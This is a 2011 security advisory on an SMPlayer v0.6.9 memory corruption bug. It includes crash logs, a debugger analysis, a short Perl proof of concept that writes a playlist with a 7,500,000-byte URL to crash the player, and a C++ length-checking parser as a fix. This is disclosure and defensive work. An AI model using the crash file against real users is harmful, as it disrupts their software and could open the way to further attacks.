Document Title:
===============
SMPlayer v0.6.9 - Memory Corruption Vulnerability
Release Date:
=============
2011-08-19
Vulnerability Laboratory ID (VL-ID):
====================================
64
Product & Service Introduction:
===============================
SMPlayer intends to be a complete front-end for MPlayer, from basic features like playing videos, DVDs, and VCDs to more advanced
features like support for MPlayer filters and more. One of the most interesting features of SMPlayer: it remembers the settings
of all files you play. So you start to watch a movie but you have to leave... don't worry, when you open that movie again it will
resume at the same point you left it, and with the same settings: audio track, subtitles, volume...
Other additional interesting features:
* Configurable subtitles. You can choose font and size, and even colors for the subtitles.
* Audio track switching. You can choose the audio track you want to listen to. Works with avi and mkv. And of course with DVDs.
* Seeking by mouse wheel. You can use your mouse wheel to go forward or backward in the video.
* Video equalizer, allows you to adjust the brightness, contrast, hue, saturation and gamma of the video image.
* Multiple speed playback. You can play at 2X, 4X... and even in slow motion.
* Filters. Several filters are available: deinterlace, postprocessing, denoise... and even a karaoke filter (voice removal).
* Audio and subtitles delay adjustment. Allows you to sync audio and subtitles.
* Advanced options, such as selecting a demuxer or video & audio codecs.
* Playlist. Allows you to enqueue several files to be played one after each other. Autorepeat and shuffle supported too.
* Preferences dialog. You can easily configure every option of SMPlayer by using a nice preferences dialog.
* Possibility to search automatically for subtitles in opensubtitles.org.
* Translations: currently SMPlayer is translated into more than 20 languages, including Spanish, German, French, Italian, Russian, Chinese, Japanese....
* It is multiplatform. Binaries available for Windows and Linux.
* SMPlayer is under the GPL license.
(Copy of the Vendor Homepage: http://smplayer.sourceforge.net/index.php?tr_lang=en)
Abstract Advisory Information:
==============================
Vulnerability Lab Team discovered a Memory Corruption Vulnerability in SMPlayer v0.6.9.
Vulnerability Disclosure Timeline:
==================================
2011-08-19: Public or Non-Public Disclosure
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A memory corruption vulnerability has been detected in SMPlayer. An attacker can crash the software via the URL stream function.
Attackers can crash the software locally, or remotely with user interaction, through playlist (stream-list) files.
--- Logs ---
C:/Program Files (x86)/SMPlayer/mplayer/mplayer.exe -noquiet -nofs -nomouseinput -sub-fuzziness 1 -identify -slave -vo direct3d,
-nokeepaspect -priority abovenormal -framedrop -nodr -double -wid 4852742 -colorkey 0x020202 -monitorpixelaspect 1 -ass -embeddedfonts
-ass-line-spacing 0 -ass-font-scale 1 -ass-styles C:/Users/Rem0ve/.smplayer/styles.ass -fontconfig -font Arial -subfont-autoscale 0
-subfont-osd-scale 20 -subfont-text-scale 20 -subcp ISO-8859-1 -subpos 100 -cache 1000 -osdlevel 0 -prefer-ipv4 -vf-add screenshot
-slices -af equalizer=0:0:0:0:0:0:0:0:0:0 -softvol -softvol-max 110 http://[over-sized+string_A+]
--- DEBUG LOG ---
///registers
EAX 00000000
ECX 00069304
EDX 00000002
EBX 282F0020
ESP 0022ADBC
EBP 0022ADC4
ESI 0C279B40 UNICODE "A+"
EDI 382F1000
EIP 77C17026 msvcrt.77C17026
C 0 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 1.0000000000000000000
ST1 empty %#.19L
ST2 empty 1.0000000000000000000
ST3 empty %#.19L
ST4 empty 67.000000000000000000
ST5 empty 445.00000000000000000
ST6 empty 387.48437500000000000
ST7 empty 387.98437500000000000
3 2 1 0 E S P U O Z D I
FST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 037F Prec NEAR,64 Mask 1 1 1 1 1 1
--- ERROR LOG ---
ECX=00069304 (decimal 430852.)
DS:[ESI]=[0C279B40]=00410041
ES:[EDI]=[382F1000]=???
The address 382f1000 is not mapped in the process (write access is not allowed), so the memcpy faults.
//analyze -v of the crash
FAULTING_IP:
msvcrt!memcpy+33
77c16fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 77c16fa3 (msvcrt!memcpy+0x00000033)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 382f1000
Attempt to write to address 382f1000
FAULTING_THREAD: 00000c90
DEFAULT_BUCKET_ID: STRING_DEREFERENCE
PROCESS_NAME: image00400000
ERROR_CODE: (NTSTATUS) 0xc0000005 - De instructie op 0x%08lx verwijst naar geheugen op 0x%08lx. De lees- of schrijfbewerking ("%s") op het geheugen is mislukt.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - De instructie op 0x%08lx verwijst naar geheugen op 0x%08lx. De lees- of schrijfbewerking ("%s") op het geheugen is mislukt.
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 382f1000
WRITE_ADDRESS: 382f1000
FOLLOWUP_IP:
msvcrt!memcpy+33
77c16fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
NTGLOBALFLAG: 70
APPLICATION_VERIFIER_FLAGS: 0
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE
BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE
LAST_CONTROL_TRANSFER: from 6a23aedb to 77c16fa3
STACK_TEXT:
0022adc4 6a23aedb 37658244 0b6e0032 00e4e71e msvcrt!memcpy+0x33
WARNING: Stack unwind information not available. Following frames may be wrong.
0022adf4 00570c53 00dc79e4 0022aeec ffffffff QtCore4!ZN7QString6appendERKS_+0x7b
0022ae74 005d7091 00dc75b8 0022aeec ffffffff image00400000+0x170c53
0022af64 6a1cca27 00000000 02450030 0022af94 image00400000+0x1d7091
0022afe4 6a1cde61 00000000 02450030 0022b084 QtCore4!Z17qt_message_output9QtMsgTypePKc+0x57
0022b074 00488dcf 006726b0 07130030 0022b1fc QtCore4!Z6qDebugPKcz+0xb1
0022b304 00493e97 00dcd768 0022b36c 00000000 image00400000+0x88dcf
0022b394 00493f61 00dcd768 ffffffff 0022b424 image00400000+0x93e97
0022b3a4 004975b8 00dcd768 00e733f0 0022b3d4 image00400000+0x93f61
0022b424 004a0638 00dcd768 00000000 00000029 image00400000+0x975b8
0022b4e4 6a340a0f 00dcd768 00000000 00000029 image00400000+0xa0638
0022b5e4 65101f27 00e733f0 00000005 00000006 QtCore4!ZN11QMetaObject8activateEP7QObjectiiPPv+0x58f
0022b614 651023da 00e733f0 00000000 00e733f0 QtGui4!ZN7QAction9triggeredEb+0x47
0022b634 656df96e 00e733f0 00000000 0022b6d4 QtGui4!ZN7QAction8activateENS_11ActionEventE+0x6a
0022b644 655ad278 01377560 01377560 003d0000 QtGui4!ZN11QToolButton14nextCheckStateEv+0x2e
0022b6d4 655ad5e6 01392c38 0022bfbc 00000000 QtGui4!ZN15QAbstractButton12focusInEventEP11QFocusEvent+0x1a8
0022b6f4 656df6ec 01377560 0022bfac 00000003 QtGui4!ZN15QAbstractButton17mouseReleaseEventEP11QMouseEvent+0x66
0022b714 6517bd0d 01377560 0022bfac 0022b7a0 QtGui4!ZN11QToolButton17mouseReleaseEventEP11QMouseEvent+0x1c
0022b8f4 655ac567 01377560 0022bfac 01377560 QtGui4!ZN7QWidget5eventEP6QEvent+0x48d
0022b914 656e1dcc 01377560 0022bfac 0022bfac QtGui4!ZN15QAbstractButton5eventEP6QEvent+0x67
0022b934 6510c8ac 01377560 0022bfac 0022bfac QtGui4!ZN11QToolButton5eventEP6QEvent+0x4c
0022b964 6510f2b7 00d805e8 01377560 0022bfac QtGui4!ZN19QApplicationPrivate13notify_helperEP7QObjectP6QEvent+0xcc
0022bcd4 6a32984a 0022fe00 01377560 0022bfac QtGui4!ZN12QApplication6notifyEP7QObjectP6QEvent+0x12b7
0022bd64 6510db27 0022fe00 01377560 0022bfac QtCore4!ZN16QCoreApplication14notifyInternalEP7QObjectP6QEvent+0xca
0022be34 6518bb86 01377560 0022bfac 01377560 QtGui4!ZN19QApplicationPrivate14sendMouseEventEP7QWidgetP11QMouseEventS1_S1_PS1_R8QPointerIS0_E+0x447
0022c094 6518e730 0138ef78 0022db1c 0022c304 QtGui4!ZN15QSessionManager6cancelEv+0xc86
0022db64 77d18709 000a0468 00000202 00000000 QtGui4!ZN19QApplicationPrivate10closePopupEP7QWidget+0x1a20
0022db90 77d187eb 6518d430 000a0468 00000202 USER32!InternalCallWinProc+0x28
0022dbf8 77d189a5 00000000 6518d430 000a0468 USER32!UserCallWinProcCheckWow+0x150
0022dc58 77d189e8 0022ddb0 00000000 0022fb08 USER32!DispatchMessageWorker+0x306
0022dc68 6a35fc81 0022ddb0 0022ddb0 00000000 USER32!DispatchMessageW+0xf
0022fb08 65192970 003dfe88 0022fb20 003dc6d8 QtCore4!ZN21QEventDispatcherWin3213processEventsE6QFlagsIN10QEventLoop17ProcessEventsFlagEE+0x971
0022fb38 6a329168 003dfe88 0022fb50 0022fb58 QtGui4!Z25qWinProcessConfigRequestsv+0x1d0
0022fb78 6a329371 0022fca0 0022fc00 0022fc08 QtCore4!ZN10QEventLoop13processEventsE6QFlagsINS_17ProcessEventsFlagEE+0x48
0022fc28 6a32f1af 0022fca0 0022fc90 0022fcc8 QtCore4!ZN10QEventLoop4execE6QFlagsINS_17ProcessEventsFlagEE+0xf1
0022fcc8 005d5f61 0022fd80 0022fd70 0022fe00 QtCore4!ZN16QCoreApplication4execEv+0xdf
0022fe28 005edb51 00000001 00d805b0 00d80558 image00400000+0x1d5f61
0022fef8 005ed7da 00400000 00000000 00241f08 image00400000+0x1edb51
0022ff78 004011e7 00000001 003d44d8 003d2cd0 image00400000+0x1ed7da
0022ffb0 00401258 00000002 00000009 0022fff0 image00400000+0x11e7
0022ffc0 7c816d4f 00f1f6f2 00f1f772 7ffdd000 image00400000+0x1258
0022fff0 00000000 00401240 00000000 78746341 kernel32!BaseProcessStart+0x23
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: msvcrt!memcpy+33
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: msvcrt
IMAGE_NAME: msvcrt.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 411098b9
STACK_COMMAND: ~0s ; kb
FAILURE_BUCKET_ID: STRING_DEREFERENCE_c0000005_msvcrt.dll!memcpy
BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_msvcrt!memcpy+33
Followup: MachineOwner
Pictures:
../mem1.png
Proof of Concept (PoC):
=======================
This vulnerability can be exploited by local attackers, or by remote attackers with user interaction, via a stream playlist ...
#!/usr/bin/perl
# Generates a .pls playlist with a single over-sized URL entry (7,500,000 'A'
# bytes); opening it in SMPlayer v0.6.9 triggers the crash described above.
use strict;
use warnings;

my $header1 = "[playlist]\n";
my $header2 = "NumberOfEntries=1\n";
my $header3 = "File1=http://";
my $bof     = "\x41" x 7500000;    # 7,500,000 bytes of 'A'

# Write mode ('>') so a re-run does not append a second copy to an old file.
open(my $fh, '>', '7500000.pls') or die "Cannot open 7500000.pls: $!";
binmode($fh);
print $fh $header1 . $header2 . $header3 . $bof;
close($fh) or die "Cannot close 7500000.pls: $!";
Solution - Fix & Patch:
=======================
Restrict URL requests to a working maximum size and add dedicated exception handling for over-sized requests.
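One way to implement the size limit recommended above, written in C++ as an added example (not SMPlayer's or Qt's own code): a .pls reader that length-checks each FileN= entry on the raw line before copying it, so an over-sized URL is dropped with a reason instead of reaching the player's string handling. The 2048-byte cap and the names parsePls, PlsEntry and PlsResult are assumptions.

```cpp
#include <cstddef>
#include <cstdlib>
#include <sstream>
#include <string>
#include <vector>
// Hypothetical cap (an assumption, not a value SMPlayer defines): generous for
// any real stream URL, far below the 7,500,000-byte entry in the PoC above.
constexpr std::size_t kMaxUrlLength = 2048;

struct PlsEntry {
    int index;        // N taken from the FileN= key
    std::string url;
};

struct PlsResult {
    std::vector<PlsEntry> accepted;
    std::vector<std::string> rejected;  // one reason per dropped entry
};

// Parse the INI-style text of a .pls file. Each FileN= value is length-checked
// on the raw line before it is copied anywhere, so an over-sized entry is
// dropped with a reason instead of being handed to the player's string code.
PlsResult parsePls(const std::string& text, std::size_t maxUrl = kMaxUrlLength) {
    PlsResult result;
    std::istringstream in(text);
    std::string line;
    bool inPlaylist = false;
    while (std::getline(in, line)) {
        if (!line.empty() && line.back() == '\r') line.pop_back();  // CRLF files
        if (line == "[playlist]") { inPlaylist = true; continue; }
        if (!inPlaylist || line.compare(0, 4, "File") != 0) continue;
        const std::size_t eq = line.find('=');
        if (eq == std::string::npos) continue;
        const std::string key = line.substr(0, eq);
        const int index = std::atoi(key.c_str() + 4);
        if (index <= 0) {
            result.rejected.push_back(key + ": malformed entry key");
            continue;
        }
        const std::size_t urlLen = line.size() - eq - 1;
        if (urlLen > maxUrl) {
            result.rejected.push_back(key + ": URL length " + std::to_string(urlLen)
                                      + " exceeds limit " + std::to_string(maxUrl));
            continue;
        }
        result.accepted.push_back({index, line.substr(eq + 1)});
    }
    return result;
}
```

The rejected list is what a player would log or surface to the user; the accepted entries are the only ones that should ever be passed on to mplayer.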
Security Risk:
==============
The security risk of the vulnerability is estimated as medium because of the remote crash method.
Credits & Authors:
==================
Vulnerability Research Laboratory - Pim Campers (X4lt)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: [email protected] - [email protected] - [email protected]
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.
Copyright © 2012 | Vulnerability Laboratory